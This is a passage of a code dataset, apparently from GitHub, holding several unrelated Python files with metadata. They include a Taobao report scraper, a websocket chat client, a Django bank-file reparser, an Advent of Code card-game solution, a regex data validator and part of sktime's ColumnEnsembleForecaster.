"sotinyurl.tinyurls.models.TinyUrl.objects.bulk_create", "line_number": 33, "usage_type": "call"}, {"api_name": "sotinyurl.tinyurls.models.TinyUrl.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sotinyurl.tinyurls.models.TinyUrl", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "39641318097", "text": "from handle.website.base import Base\nfrom common.private_logging import Logging\nfrom common.private_time import Time\n\n\nclass AccountDay(Base):\n def operation_page(self):\n self.driver.get('https://branding.taobao.com/#!/report/index?productid=101005202&effect=15&startdate=2019-06-05&enddate=2019-06-19')\n Time.sleep(3)\n self.driver.find_element_by_xpath('//*[@id=\"brix_12290\"]/div[4]/a').click()\n Time.sleep(3)\n self.wait_download_finish()\n Logging.info(self.source_data_list)\n Logging.info('end')\n\n def operation_data_process(self):\n Logging.info(self.data_list)\n Logging.info('operation_data_process')\n\n\nif __name__ == '__main__':\n store_id = 20\n page_data_id = 10\n port = 9000\n # step1:初始化爬虫任务所需的信息(统一)\n accountDay = AccountDay(store_id, page_data_id, port)\n # step2:页面操作含取数,获取:self.source_data/self.file_names(定制开发)\n accountDay.operation_page()\n # step3:数据处理(定制开发)\n accountDay.operation_data_process()\n # step4:数据入库(统一)\n # accountDay.operation_data_input()\n # step5:目前只针对下载文件 进行数据备份(针对文件下载类取数)(统一)\n # accountDay.operation_data_backup()\n", "repo_name": "2659910409/EC_Spider", "sub_path": "handle/website/branding/starstore_report.py", "file_name": "starstore_report.py", "file_ext": "py", "file_size_in_byte": 1298, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "handle.website.base.Base", "line_number": 6, "usage_type": "name"}, {"api_name": "common.private_time.Time.sleep", "line_number": 9, "usage_type": "call"}, {"api_name": "common.private_time.Time", "line_number": 9, "usage_type": "name"}, {"api_name": "common.private_time.Time.sleep", "line_number": 11, "usage_type": "call"}, {"api_name": "common.private_time.Time", "line_number": 11, "usage_type": "name"}, {"api_name": "common.private_logging.Logging.info", "line_number": 13, "usage_type": "call"}, {"api_name": "common.private_logging.Logging", "line_number": 13, "usage_type": "name"}, {"api_name": "common.private_logging.Logging.info", "line_number": 14, "usage_type": "call"}, {"api_name": "common.private_logging.Logging", "line_number": 14, "usage_type": "name"}, {"api_name": "common.private_logging.Logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "common.private_logging.Logging", "line_number": 17, "usage_type": "name"}, {"api_name": "common.private_logging.Logging.info", "line_number": 18, "usage_type": "call"}, {"api_name": "common.private_logging.Logging", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "15763358249", "text": "import json\nimport random\nimport sys\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, List, Tuple\n\nimport websockets\n\nsys.path.insert(0, str(Path(__file__).parent.parent.parent))\nfrom enhancers import ciphers # noqa: E402\nfrom enhancers.message_processer import ( # noqa: E402\n AutoCorrecter, AutoTranslater\n)\n\n# ADD\nDOMAIN = \"ws://192.155.88.143:5005\"\n# DOMAIN = \"ws://localhost:5000\"\nROUTE = \"/ws\"\nURL = DOMAIN + ROUTE\n\nautocorrecter = AutoCorrecter()\nautotranslater = AutoTranslater()\n\n\n# add what ip to connect to in the constructor?\nclass SocketClient:\n \"\"\"API Wrapper that handles all client side communication with the server.\"\"\"\n\n connected_to_room = False\n\n async def connect(self):\n \"\"\"Connects to the server. Must be called in order for everything to work.\"\"\"\n self.ws = await websockets.connect(URL)\n\n async def _receive(self) -> Dict[str, Any]:\n \"\"\"Receives a message from the server. Converts raw data to python dict.\"\"\"\n res = await self.ws.recv()\n load = json.loads(res)\n return load\n\n async def _send(\n self, type: str, payload: Dict[str, Any], reply: bool = True\n ) -> Dict[str, Any]:\n \"\"\"Sends a message to the server. Expects no reply by default.\"\"\"\n req = json.dumps({\"type\": type, **payload})\n await self.ws.send(req)\n if reply:\n return await self._receive()\n else:\n return {}\n\n async def login(self, username: str, tag: int, password: str) -> bool:\n \"\"\"\n Sends a login request to the server.\n\n Returns True if it was succesful and False if not.\n \"\"\"\n payload = {\"username\": username, \"tag\": tag, \"password\": password}\n res = await self._send(\"login\", payload)\n return res[\"success\"]\n\n async def logout(self) -> bool:\n \"\"\"\n Logs out the user.\n\n Returns if successful or not.\n \"\"\"\n res = await self._send(\"logout\", {})\n return res[\"success\"]\n\n async def register(self, username: str, password: str) -> int:\n \"\"\"\n Sends a register request to the server. Also logs user in.\n\n Returns the unique user tag of the new user.\n \"\"\"\n payload = {\"username\": username, \"password\": password}\n res = await self._send(\"register\", payload)\n return res[\"tag\"]\n\n async def create_room(self, name: str) -> Tuple[int, int]:\n \"\"\"\n Asks the server to create a room with given name. Also joins room.\n\n Returns (roomcode, roomid) of the newly created room.\n Cannot fail. Authentication is required.\n \"\"\"\n payload = {\"name\": name}\n res = await self._send(\"createroom\", payload)\n return (res[\"code\"], res[\"id\"])\n\n async def join_room(self, code: str) -> Dict[str, Any]:\n \"\"\"\n Joins the room with given code.\n\n Returns the room information of newly joined room.\n Authentication required.\n \"\"\"\n payload = {\"code\": code}\n res = await self._send(\"joinroom\", payload)\n return res\n\n async def connect_room(self, id: int) -> bool:\n \"\"\"\n Connects to a room.\n\n Returns whether connection was successful or not.\n Authentication required. Joining room required.\n \"\"\"\n payload = {\"id\": id}\n res = await self._send(\"roomconnect\", payload)\n self.connected_to_room = res[\"success\"]\n return res[\"success\"]\n\n async def message_listener(self, callback: Callable[[str], None]) -> None:\n \"\"\"\n Starts a message receiving listener.\n\n When a message is received, callback function is called on the new message.\n Authentication required. Connected room required.\n \"\"\"\n async for res in self.ws:\n if not self.connected_to_room:\n break\n res = json.loads(res)\n # if not a roomconnect message, then break\n if res[\"type\"] != \"roomconnect\":\n break\n # edited message or new message\n if \"new\" in res:\n msg = res[\"new\"]\n callback(msg) # make this the new_callback\n elif \"update\" in res:\n msg = res[\"update\"]\n # update_callback(msg) not implemented\n else:\n break\n\n async def send_message(self, message: str) -> bool:\n \"\"\"\n Sends a message to the server.\n\n Does not expect a reply from the server.\n Authentication required. Connected room required.\n \"\"\"\n enhanced_message = message\n if \"*\" not in [message[0], message[-1]]:\n if random.random() < 0.05:\n enhanced_message = ciphers.random_cipher(message)\n else:\n if random.random() > 0.5:\n enhanced_message = autotranslater.random_autotranslate(message)\n else:\n enhanced_message = autocorrecter.random_autocorrect(message)\n payload = {\"content\": enhanced_message, \"action\": \"send\"}\n await self._send(\"roomconnect\", payload, reply=False)\n return True\n\n async def exit_room(self) -> bool:\n \"\"\"\n Exits the currently connected room.\n\n Returns whether succesful or not.\n Authentication required. Connected room required.\n \"\"\"\n payload = {\"end\": True}\n await self._send(\"roomconnect\", payload, reply=False)\n self.connected_to_room = False\n return True\n\n async def list_rooms(self) -> List[Dict[str, Any]]:\n \"\"\"\n Asks server for a list of rooms that the current user has joined.\n\n Returns list of connected rooms.\n Authentication required. Operation cannot fail.\n \"\"\"\n res = await self._send(\"listrooms\", {})\n return res[\"servers\"]\n\n async def change_name(self, new_name: str) -> bool:\n \"\"\"\n Asks the server to change currently logged in users name.\n\n Returns whether successful or not.\n Authentication required.\n \"\"\"\n payload = {\"name\": new_name}\n res = await self._send(\"changename\", payload)\n return res[\"success\"]\n\n async def leave_room(self, id: int) -> bool:\n \"\"\"\n Unjoins the room with specified id.\n\n Returns whether successful or not.\n Authentication required. Must have already joined the room.\n \"\"\"\n payload = {\"id\": id}\n res = await self._send(\"leaveroom\", payload)\n return res[\"success\"]\n", "repo_name": "srijal30/genuine-djinn", "sub_path": "client/gui/connection/connection.py", "file_name": "connection.py", "file_ext": "py", "file_size_in_byte": 6534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.insert", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 9, "usage_type": "call"}, {"api_name": "enhancers.message_processer.AutoCorrecter", "line_number": 21, "usage_type": "call"}, {"api_name": "enhancers.message_processer.AutoTranslater", "line_number": 22, "usage_type": "call"}, {"api_name": "websockets.connect", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 45, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 92, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 92, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 115, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 125, "usage_type": "call"}, {"api_name": "random.random", "line_number": 148, "usage_type": "call"}, {"api_name": "enhancers.ciphers.random_cipher", "line_number": 149, "usage_type": "call"}, {"api_name": "enhancers.ciphers", "line_number": 149, "usage_type": "name"}, {"api_name": "random.random", "line_number": 151, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 171, "usage_type": "name"}]} +{"seq_id": "73634838246", "text": "# pylint: disable=logging-format-interpolation\nimport logging\nfrom django.core.management.base import CommandParser\nfrom jbank.models import ReferencePaymentBatchFile, ReferencePaymentRecord\nfrom jbank.svm import parse_svm_batches_from_file\nfrom jutil.command import SafeCommand\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(SafeCommand):\n help = \"Re-parses old bank settlement .SVM (saapuvat viitemaksut) files. Used for adding missing fields.\"\n\n def add_arguments(self, parser: CommandParser):\n parser.add_argument(\"--file\", type=str)\n\n def do(self, *args, **options):\n logger.info(\"Re-parsing SVM files to update fields\")\n qs = ReferencePaymentBatchFile.objects.all()\n if options[\"file\"]:\n qs = qs.filter(file=options[\"file\"])\n for file in qs.order_by(\"id\"):\n assert isinstance(file, ReferencePaymentBatchFile)\n logger.info(\"Processing {} BEGIN\".format(file))\n batches = parse_svm_batches_from_file(file.full_path)\n for batch in batches:\n for e in batch[\"records\"]: # pylint: disable=too-many-branches\n # check missing line_number\n e2 = ReferencePaymentRecord.objects.filter(\n batch__file=file,\n line_number=0,\n record_type=e[\"record_type\"],\n account_number=e[\"account_number\"],\n paid_date=e[\"paid_date\"],\n archive_identifier=e[\"archive_identifier\"],\n remittance_info=e[\"remittance_info\"],\n payer_name=e[\"payer_name\"],\n currency_identifier=e[\"currency_identifier\"],\n name_source=e[\"name_source\"],\n correction_identifier=e[\"correction_identifier\"],\n delivery_method=e[\"delivery_method\"],\n receipt_code=e[\"receipt_code\"],\n ).first()\n if e2:\n e2.line_number = e[\"line_number\"]\n e2.save()\n logger.info(\"Updated {} line number to {}\".format(e2, e2.line_number))\n logger.info(\"Processing {} END\".format(file))\n", "repo_name": "kajala/django-jbank", "sub_path": "jbank/management/commands/reparse_svm.py", "file_name": "reparse_svm.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "jutil.command.SafeCommand", "line_number": 12, "usage_type": "name"}, {"api_name": "django.core.management.base.CommandParser", "line_number": 15, "usage_type": "name"}, {"api_name": "jbank.models.ReferencePaymentBatchFile.objects.all", "line_number": 20, "usage_type": "call"}, {"api_name": "jbank.models.ReferencePaymentBatchFile.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "jbank.models.ReferencePaymentBatchFile", "line_number": 20, "usage_type": "name"}, {"api_name": "jbank.models.ReferencePaymentBatchFile", "line_number": 24, "usage_type": "argument"}, {"api_name": "jbank.svm.parse_svm_batches_from_file", "line_number": 26, "usage_type": "call"}, {"api_name": "jbank.models.ReferencePaymentRecord.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "jbank.models.ReferencePaymentRecord.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "jbank.models.ReferencePaymentRecord", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "69921329125", "text": "#! /usr/bin/python\n\n#### Imports\n# External Libraries\nimport argparse\nimport hashlib\nimport logging\nimport os\nimport sys\nimport textwrap\n\nfrom preprocess.preprocess import Preprocessor\nfrom train.train import Trainer\nfrom evaluate.evaluate import Evaluator\nfrom generate.generate import Generator\n\n#### Constants\n\n\n#### Logger\nlog = logging.getLogger(\"root\")\nLOG_FORMAT = \"[%(asctime)s] %(message)s\"\nlogging.basicConfig(format=LOG_FORMAT)\nlog.setLevel(logging.DEBUG)\n\n\ndef main():\n ### Parse and display arguments\n arguments = parse_arguments()\n\n ### Preprocess Data\n if arguments.preprocess:\n log.info(\"Running Preprocessor\")\n preprocessor = Preprocessor(arguments)\n preprocessor.run()\n\n ### Train Data\n if arguments.train:\n log.info(\"Running Trainer\")\n trainer = Trainer(arguments)\n trainer.run()\n\n ### Evaluate Data\n if arguments.evaluate:\n log.info(\"Running Evaluate\")\n evaluator = Evaluator(arguments)\n evaluator.run()\n\n ### Generate New Data\n if arguments.generate:\n log.info(\"Running Generate\")\n generator = Generator(arguments)\n generator.run()\n\n\ndef parse_arguments():\n ### Get Arguments\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=textwrap.dedent(\"Description of the program.\"),\n epilog=\"Summary/notes/etc.\",\n )\n\n preprocess = parser.add_argument_group(\n \"Preprocessing Options\",\n \"Details on the Preprocessor, what to expect, etc.\",\n )\n\n preprocess.add_argument(\n \"-p\",\n \"--preprocess\",\n default=False,\n help=\"Preprocess Data\",\n action=\"store_true\",\n )\n\n preprocess.add_argument(\n \"-pi\",\n \"--preprocess_input_directory\",\n metavar=\"\\b\",\n default=None,\n help=\"Preprocessor Input Directory\",\n )\n\n preprocess.add_argument(\n \"-po\",\n \"--preprocess_output_dir\",\n metavar=\"\\b\",\n default=None,\n help=\"Preprocessor Output Directory\",\n )\n\n train = parser.add_argument_group(\n \"Training Options\",\n \"Details on the Training Options, what to expect, etc.\",\n )\n\n train.add_argument(\n \"-t\",\n \"--train\",\n default=False,\n help=\"Train On Data\",\n action=\"store_true\",\n )\n\n train.add_argument(\n \"--use_tensorboard\",\n default=False,\n help=\"Use a Tensorboard to Show Progress of Training\",\n action=\"store_true\",\n )\n\n evaluate = parser.add_argument_group(\n \"Evaluation Options\",\n \"Details on the Evaluation Options, what to expect, etc.\",\n )\n evaluate.add_argument(\n \"-e\",\n \"--evaluate\",\n default=False,\n help=\"Evaluate Data\",\n action=\"store_true\",\n )\n\n evaluate.add_argument(\n \"--batch_size\",\n default=128,\n metavar=\"\\b\",\n help=\"Batch Size for Evaluation Neural Network\",\n type=int,\n )\n\n evaluate.add_argument(\n \"--num_workers\",\n default=16,\n metavar=\"\\b\",\n help=\"Number of Workers for Evaluation Neural Network\",\n type=int,\n )\n\n generate = parser.add_argument_group(\n \"Generation Options\",\n \"Details on the Generation Options, what to expect, etc.\",\n )\n generate.add_argument(\n \"-g\",\n \"--generate\",\n default=False,\n help=\"Generate New Output\",\n action=\"store_true\",\n )\n\n arguments = parser.parse_args()\n log.info(\"Preprocess - %s\" % arguments.preprocess)\n log.info(\"Preprocess Input Dir - %s\" % arguments.preprocess_input_directory)\n log.info(\"Preprocess Output Dir - %s\" % arguments.preprocess_output_dir)\n log.info(\"Train - %s\" % arguments.train)\n log.info(\"Evaluate - %s\" % arguments.evaluate)\n log.info(\"Generate - %s\" % arguments.generate)\n\n return arguments\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "john-d-murphy/lmm_example_loader", "sub_path": "lmm_example_loader.py", "file_name": "lmm_example_loader.py", "file_ext": "py", "file_size_in_byte": 4018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 23, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 24, "usage_type": "attribute"}, {"api_name": "preprocess.preprocess.Preprocessor", "line_number": 34, "usage_type": "call"}, {"api_name": "train.train.Trainer", "line_number": 40, "usage_type": "call"}, {"api_name": "evaluate.evaluate.Evaluator", "line_number": 46, "usage_type": "call"}, {"api_name": "generate.generate.Generator", "line_number": 52, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 58, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 59, "usage_type": "attribute"}, {"api_name": "textwrap.dedent", "line_number": 60, "usage_type": "call"}, {"api_name": "preprocess.preprocess", "line_number": 64, "usage_type": "name"}, {"api_name": "preprocess.preprocess.add_argument", "line_number": 69, "usage_type": "call"}, {"api_name": "preprocess.preprocess", "line_number": 69, "usage_type": "name"}, {"api_name": "preprocess.preprocess.add_argument", "line_number": 77, "usage_type": "call"}, {"api_name": "preprocess.preprocess", "line_number": 77, "usage_type": "name"}, {"api_name": "preprocess.preprocess.add_argument", "line_number": 85, "usage_type": "call"}, {"api_name": "preprocess.preprocess", "line_number": 85, "usage_type": "name"}, {"api_name": "train.train", "line_number": 93, "usage_type": "name"}, {"api_name": "train.train.add_argument", "line_number": 98, "usage_type": "call"}, {"api_name": "train.train", "line_number": 98, "usage_type": "name"}, {"api_name": "train.train.add_argument", "line_number": 106, "usage_type": "call"}, {"api_name": "train.train", "line_number": 106, "usage_type": "name"}, {"api_name": "evaluate.evaluate", "line_number": 113, "usage_type": "name"}, {"api_name": "evaluate.evaluate.add_argument", "line_number": 117, "usage_type": "call"}, {"api_name": "evaluate.evaluate", "line_number": 117, "usage_type": "name"}, {"api_name": "evaluate.evaluate.add_argument", "line_number": 125, "usage_type": "call"}, {"api_name": "evaluate.evaluate", "line_number": 125, "usage_type": "name"}, {"api_name": "evaluate.evaluate.add_argument", "line_number": 133, "usage_type": "call"}, {"api_name": "evaluate.evaluate", "line_number": 133, "usage_type": "name"}, {"api_name": "generate.generate", "line_number": 141, "usage_type": "name"}, {"api_name": "generate.generate.add_argument", "line_number": 145, "usage_type": "call"}, {"api_name": "generate.generate", "line_number": 145, "usage_type": "name"}]} +{"seq_id": "27927530271", "text": "from typing import List\n\n\nDeck = List[int]\n\n\ndef play_round(player_1: Deck, player_2: Deck):\n card_1 = player_1.pop(0)\n card_2 = player_2.pop(0)\n if card_1 > card_2:\n player_1.append(card_1)\n player_1.append(card_2)\n elif card_2 > card_1:\n player_2.append(card_2)\n player_2.append(card_1)\n\n\ndef play_game(player_1: Deck, player_2: Deck) -> int:\n turns = 0\n while len(player_1) > 0 and len(player_2) > 0:\n play_round(player_1, player_2)\n turns += 1\n return turns\n\n\ndef play_round_recursive(player_1: Deck, player_2: Deck):\n card_1 = player_1.pop(0)\n card_2 = player_2.pop(0)\n if len(player_1) >= card_1 and len(player_2) >= card_2:\n sub_game_1 = player_1.copy()[:card_1]\n sub_game_2 = player_2.copy()[:card_2]\n play_game_recursive(sub_game_1, sub_game_2)\n if len(sub_game_1) == 0:\n player_2.append(card_2)\n player_2.append(card_1)\n elif len(sub_game_2) == 0:\n player_1.append(card_1)\n player_1.append(card_2)\n else:\n raise ValueError(f'ERROR - unexpected scenario: player 1: {player_1}, player_2: {player_2}')\n else:\n if card_1 > card_2:\n player_1.append(card_1)\n player_1.append(card_2)\n elif card_2 > card_1:\n player_2.append(card_2)\n player_2.append(card_1)\n\n\ndef play_game_recursive(player_1: Deck, player_2: Deck):\n positions = []\n while len(player_1) > 0 and len(player_2) > 0:\n if (player_1, player_2) not in positions:\n positions.append((player_1.copy(), player_2.copy()))\n play_round_recursive(player_1, player_2)\n else:\n player_2.clear()\n\n\ndef score_deck(deck: Deck) -> int:\n score = 0\n for i in range(len(deck)):\n score += deck[i] * (len(deck) - i)\n return score\n\n\ndef main():\n player_1 = [47, 19, 22, 31, 24, 6, 10, 5, 1, 48, 46, 27, 8, 45, 16, 28, 33, 41, 42, 36, 50, 39, 30, 11, 17]\n player_2 = [4, 18, 21, 37, 34, 15, 35, 38, 20, 23, 9, 25, 32, 13, 26, 2, 12, 44, 14, 49, 3, 40, 7, 43, 29]\n play_game(player_1, player_2)\n winning_deck = player_1\n if player_2:\n winning_deck = player_2\n score = score_deck(winning_deck)\n print(f'the winning deck has a score of {score}')\n player_1 = [47, 19, 22, 31, 24, 6, 10, 5, 1, 48, 46, 27, 8, 45, 16, 28, 33, 41, 42, 36, 50, 39, 30, 11, 17]\n player_2 = [4, 18, 21, 37, 34, 15, 35, 38, 20, 23, 9, 25, 32, 13, 26, 2, 12, 44, 14, 49, 3, 40, 7, 43, 29]\n play_game_recursive(player_1, player_2)\n winning_deck = player_1\n if player_2:\n winning_deck = player_2\n score = score_deck(winning_deck)\n print(f'the winning deck in the recursive version has a score of {score}')\n\n\n\nif __name__ == '__main__':\n main()", "repo_name": "mikealfare/advent-of-code-2020", "sub_path": "src/advent_of_code/day_22.py", "file_name": "day_22.py", "file_ext": "py", "file_size_in_byte": 2811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "28010045840", "text": "import re\nfrom data import Data\nfrom time import strptime\n\n\nclass DataValidator:\n\n def __init__(self):\n # A function list if validators\n self.validators = (\n self.check_empid, self.check_gender, self.check_age,\n self.check_sales, self.check_bmi, self.check_salary,\n self.check_birthday\n )\n\n def regx_match(self, pattern, data):\n result = None\n match_obj = re.match(pattern, str(data), re.I)\n if match_obj:\n result = match_obj.group(1)\n return result\n\n def regx_match_group(self, pattern, data):\n result = None\n match_obj = re.match(pattern, str(data), re.I)\n if match_obj:\n result = match_obj.groups()\n return result\n\n def check_empid(self, data):\n \"\"\"\n Check if the input empID is valid.\n :return: Formatted empid if the input one is valid,\n otherwise, return None\n Author: Vaishali Patel\n \"\"\"\n pattern = r\"^(?P<empid>[A-Z][0-9]{3})$\"\n result = self.regx_match(pattern, data)\n if result is not None:\n return result.upper()\n\n return result\n\n def check_gender(self, data):\n \"\"\"\n Check validation of gender\n :param gender: <String>\n :return: washed data\n :Author: Zhiming Liu\n \"\"\"\n pattern_01 = r\"^(?P<gender>F|girl|female|miss|ms)$\"\n pattern_02 = r\"^(?P<gender>M|boy|male|mister|mr)$\"\n\n result = self.regx_match(pattern_01, data)\n if result is not None:\n return 'F'\n\n result = self.regx_match(pattern_02, data)\n if result is not None:\n return \"M\"\n\n def check_age(self, data):\n \"\"\"\n Check validation of age\n :param age: <String>\n :return: washed data\n :Author: Zhiming Liu\n \"\"\"\n pattern = r\"^(?P<age>[0-9]{1,2})$\"\n result = self.regx_match(pattern, data)\n if result is not None:\n return \"{0:02}\".format(int(result))\n return result\n\n def check_sales(self, data):\n \"\"\"\n Check if the input sales is valid.\n :return: Formatted sales if the input one is valid,\n otherwise, return None\n :Author: Zhiming Liu\n \"\"\"\n pattern = r\"^(?P<sales>[0-9]{1,3})$\"\n result = self.regx_match(pattern, data)\n if result is not None:\n return \"{0:03}\".format(int(result))\n return result\n\n def check_bmi(self, data):\n \"\"\"\n Check if the input BMI is valid.\n :return: Formatted BMI if the input one is valid,\n otherwise, return None\n :Author: Zhiming Liu\n \"\"\"\n pattern = r\"^(?P<bmi>normal|overweight|obesity|underweight)$\"\n result = self.regx_match(pattern, data)\n if result is not None:\n return \" \".join(text[0].upper() + text[1:]\n for text in result.split())\n return result\n\n def check_salary(self, data):\n \"\"\"\n Check if the input salary is valid.\n :return: Formatted salary if the input one is valid,\n otherwise, return None\n :Author: Zhiming Liu\n \"\"\"\n pattern = r\"^(?P<salary>[0-9]{2,3})$\"\n result = self.regx_match(pattern, data)\n if result is not None:\n return \"{0:03}\".format(int(result))\n return result\n\n def check_birthday(self, data):\n \"\"\"\n Check validation of birthday\n :param birthday: <String>\n :return: washed data\n :Author: Zhiming Liu\n \"\"\"\n pattern = r\"^([0-9]{1,2})[-/\\.]([0-9]{1,2})[-/\\.]([0-9]{2}|[0-9]{4})$\"\n result = self.regx_match_group(pattern, data)\n if result is not None:\n date = strptime(\"-\".join(result), \"%d-%m-%Y\")\n return \"{0:02}-{1:02}-{2:04}\"\\\n .format(date.tm_mday, date.tm_mon, date.tm_year)\n\n return result\n\n def check_all(self, all_data: list):\n \"\"\"\n Check validation of the all data. Throw ValueError Exceptions.\n :param all_data: a data list\n :return: washed data in dictionary\n :Author: Zhiming Liu\n \"\"\"\n # Save the washed data temporarily\n result = []\n\n # If the number of the data is not correct, return an empty result\n if not len(all_data) == len(Data):\n return result\n\n # Check and wash data\n key = 0\n while key < len(all_data):\n # Get the validation function by the order of the data\n v = self.validators[key]\n # Append to the result\n result.append(v(all_data[key]))\n key += 1\n\n return result\n\n\n# print(DataValidator.check_bmi(\"jbjndsoidiri88888normaljdjdjd\"))\n# v = DataValidator()\n# print(DataValidator.check_birthday(\"31-02-1990\"))\n", "repo_name": "heyerique/Refactoring", "sub_path": "src/data_validator.py", "file_name": "data_validator.py", "file_ext": "py", "file_size_in_byte": 4826, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.match", "line_number": 18, "usage_type": "call"}, {"api_name": "re.I", "line_number": 18, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 25, "usage_type": "call"}, {"api_name": "re.I", "line_number": 25, "usage_type": "attribute"}, {"api_name": "time.strptime", "line_number": 125, "usage_type": "call"}, {"api_name": "data.Data", "line_number": 142, "usage_type": "argument"}]} +{"seq_id": "33997802920", "text": "__author__ = [\"GuzalBulatova\", \"mloning\", \"fkiraly\"]\n__all__ = [\"ColumnEnsembleForecaster\"]\n\nfrom sktime.base._meta import _ColumnEstimator\nfrom sktime.forecasting.base._base import BaseForecaster\nfrom sktime.forecasting.base._meta import _HeterogenousEnsembleForecaster\n\n# mtypes that are native pandas\n# ColumnEnsembleForecaster uses these internally, since we need (pandas) columns\nPANDAS_MTYPES = [\"pd.DataFrame\", \"pd-multiindex\", \"pd_multiindex_hier\"]\n\n\nclass ColumnEnsembleForecaster(_HeterogenousEnsembleForecaster, _ColumnEstimator):\n \"\"\"Forecast each series with separate forecaster.\n\n Applies different forecasters by columns.\n\n `ColumnEnsembleForecaster` is passed forecaster/index pairs, exact syntax below.\n Index can be single pandas index element, pd.Index, int, str, or list thereof.\n If iterable (pd.Index, list), refers to multiple columns.\n\n Behaviour in `fit`, `predict`, `update`:\n For index pairs f_i, ix_i passed, applies forecaster f_i to column(s) ix_i.\n `predict` results are concatenated to one container with same columns as in `fit`.\n\n Parameters\n ----------\n forecasters : sktime forecaster, or list of tuples (str, estimator, int or pd.index)\n if tuples, with name = str, estimator is forecaster, index as int or index\n if last element is index, it must be int, str, or pd.Index coercible\n if last element is int x, and is not in columns, is interpreted as x-th column\n all columns must be present in an index\n\n If forecaster, clones of forecaster are applied to all columns.\n If list of tuples, forecaster in tuple is applied to column with int/str index\n\n Examples\n --------\n .. Doctest::\n\n >>> import pandas as pd\n >>> from sktime.forecasting.compose import ColumnEnsembleForecaster\n >>> from sktime.forecasting.naive import NaiveForecaster\n >>> from sktime.forecasting.trend import PolynomialTrendForecaster\n >>> from sktime.datasets import load_longley\n\n Using integers (column iloc references) for indexing:\n\n .. Doctest::\n\n >>> y = load_longley()[1][[\"GNP\", \"UNEMP\"]]\n >>> forecasters = [\n ... (\"trend\", PolynomialTrendForecaster(), 0),\n ... (\"naive\", NaiveForecaster(), 1),\n ... ]\n >>> forecaster = ColumnEnsembleForecaster(forecasters=forecasters)\n >>> forecaster.fit(y, fh=[1, 2, 3])\n ColumnEnsembleForecaster(...)\n >>> y_pred = forecaster.predict()\n\n Using strings for indexing:\n\n .. Doctest::\n\n >>> df = pd.DataFrame({\"a\": [1, 2, 3], \"b\": [4, 5, 6]})\n >>> fc = ColumnEnsembleForecaster(\n ... [(\"foo\", NaiveForecaster(), \"a\"), (\"bar\", NaiveForecaster(), \"b\")]\n ... )\n >>> fc.fit(df, fh=[1, 42])\n ColumnEnsembleForecaster(...)\n >>> y_pred = fc.predict()\n\n Applying one forecaster to multiple columns, multivariate:\n\n .. Doctest::\n\n >>> df = pd.DataFrame({\"a\": [1, 2, 3], \"b\": [4, 5, 6], \"c\": [7, 8, 9]})\n >>> fc = ColumnEnsembleForecaster(\n ... [(\"ab\", NaiveForecaster(), [\"a\", 1]), (\"c\", NaiveForecaster(), 2)]\n ... )\n >>> fc.fit(df, fh=[1, 42])\n ColumnEnsembleForecaster(...)\n >>> y_pred = fc.predict()\n \"\"\"\n\n _tags = {\n \"scitype:y\": \"both\",\n \"ignores-exogeneous-X\": False,\n \"y_inner_mtype\": PANDAS_MTYPES,\n \"X_inner_mtype\": PANDAS_MTYPES,\n \"requires-fh-in-fit\": False,\n \"handles-missing-data\": False,\n \"capability:pred_int\": True,\n \"capability:pred_int:insample\": True,\n }\n\n # for default get_params/set_params from _HeterogenousMetaEstimator\n # _steps_attr points to the attribute of self\n # which contains the heterogeneous set of estimators\n # this must be an iterable of (name: str, estimator, ...) tuples for the default\n _steps_attr = \"_forecasters\"\n # if the estimator is fittable, _HeterogenousMetaEstimator also\n # provides an override for get_fitted_params for params from the fitted estimators\n # the fitted estimators should be in a different attribute, _steps_fitted_attr\n # this must be an iterable of (name: str, estimator, ...) tuples for the default\n 